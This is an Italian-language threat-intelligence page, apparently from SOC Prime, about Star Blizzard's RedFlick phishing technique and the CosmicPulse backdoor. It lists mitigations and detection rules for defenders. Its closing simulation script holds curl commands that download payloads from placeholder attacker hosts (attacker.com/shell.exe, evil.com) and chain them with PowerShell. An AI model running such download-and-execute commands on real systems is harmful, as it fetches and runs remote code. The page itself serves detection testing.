SOC Prime Bias: Critical

01 Oct 2026 08:18 UTC

Star Blizzard Utilizza RedFlick per Migliorare la Distribuzione di Phishing e Malware

Author Photo
SOC Prime Team linkedin icon Segui
Star Blizzard Utilizza RedFlick per Migliorare la Distribuzione di Phishing e Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

L’attore sponsorizzato dallo stato russo Star Blizzard ha evoluto le sue tattiche utilizzando la tecnica RedFlick per distribuire la backdoor CosmicPulse. L’attore si è spostato da spear-phishing altamente mirati a campagne di phishing automatizzate su larga scala utilizzando siti web compromessi. Queste campagne utilizzano metodi di consegna sofisticati, inclusi file VHDX e payload nascosti all’interno di file PDF per evadere il rilevamento.

Indagine

Microsoft Threat Intelligence ha analizzato varie ondate di phishing osservate nel corso del 2026, identificando una transizione da catene basate su ClickFix a compiti RedFlick programmati. L’indagine ha dettagliato un flusso di esecuzione multistadio che coinvolge file LNK, esecuzione di comandi locali SSH e l’uso di WebDAV per il recupero remoto dei payload. L’analisi tecnica ha anche scoperto l’uso della steganografia e della crittografia basata sul registro per il payload CosmicPulse.

Mitigazione

Le organizzazioni dovrebbero implementare autenticazioni resistenti al phishing e politiche di accesso condizionato per proteggere le identità. La protezione degli endpoint dovrebbe essere configurata con EDR in modalità blocco e protezione antivirus in tempo reale attivata. Inoltre, l’implementazione di regole di riduzione della superficie di attacco può prevenire l’esecuzione di script offuscati e file eseguibili non autorizzati.

Risposta

Al rilevamento, i team di sicurezza dovrebbero utilizzare l’EDR per sanare artefatti dannosi e indagare su tentativi di accesso sospetti. Le modalità di indagine automatica e di rimedio dovrebbero essere abilitate per ridurre i tempi di risposta. Le organizzazioni dovrebbero anche utilizzare soluzioni avanzate anti-phishing e Zero-hour auto purge per neutralizzare le comunicazioni dannose in arrivo.

Flusso di attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Riga di comando sospetta contiene percorso UNC con eseguibile come argomento (via cmdline)

Team SOC Prime
30 Set 2026

Possibile scoperta delle condivisioni di rete (via cmdline)

Team SOC Prime
30 Set 2026

Tentativi sospetti di installazione nascosta tramite installatore remoto MsiExec (via cmdline)

Team SOC Prime
30 Set 2026

Conhost LOLBAS (via cmdline)

Team SOC Prime
30 Set 2026

Possibile utilizzo di strumenti di tunneling [Windows] (via cmdline)

Team SOC Prime
30 Set 2026

Uso sospetto di CURL (via cmdline)

Team SOC Prime
30 Set 2026

Comando e controllo sospetto tramite richiesta DNS di dominio di primo livello (TLD) insolito (via dns)

Team SOC Prime
30 Set 2026

IOC (HashSha256) da rilevare: Star Blizzard affina phishing e distribuzione malware con la tecnica RedFlick

Regole AI di SOC Prime
30 Set 2026

IOC (SourceIP) da rilevare: Star Blizzard affina phishing e distribuzione malware con la tecnica RedFlick

Regole AI di SOC Prime
30 Set 2026

IOC (DestinationIP) da rilevare: Star Blizzard affina phishing e distribuzione malware con la tecnica RedFlick

Regole AI di SOC Prime
30 Set 2026

Rileva esecuzione PowerShell da PDF scaricato [Windows Powershell]

Regole AI di SOC Prime
30 Set 2026

Rilevamento tecnica RedFlick di Star Blizzard – Attività pianificate e esecuzione tramite linea di comando [Creazione processo su Windows]

Regole AI di SOC Prime
30 Set 2026

Esecuzione di simulazione

  • Narrazione dell’attacco & Comandi: L’avversario distribuisce un’email di phishing contenente un link a un file dannoso. All’interazione, viene attivata una sequenza in cui curl viene utilizzato per recuperare una seconda fase. Per mimetizzarsi con i processi di sistema, il comando è progettato per includere esplicitamente i termini PowerShell, PDF (riferendosi alla fonte dell’attivazione), e conhost.exe nel testo della riga di comando per adattarsi alla logica della regola di rilevamento target. Lo scopo è eseguire un payload decodificato incorporato all’interno di una struttura PDF.

  • Script di test di regressione:

    # Script di simulazione per attivare la regola 'Rileva esecuzione PowerShell da PDF scaricato'.
    # Questo script costruisce una stringa di riga di comando che include tutte le quattro parole chiave richieste.
    
    $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF"
    $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extracting from PDF...'; Start-Process conhost.exe}"
    
    # Eseguiamo tramite cmd per garantire che conhost.exe faccia parte dell'albero dei processi/contesto comandi
    Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extracting from PDF... using conhost.exe`""
  • Comandi di pulizia:

    # Pulisci i file generati durante la simulazione
    Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue
    Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue
    Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue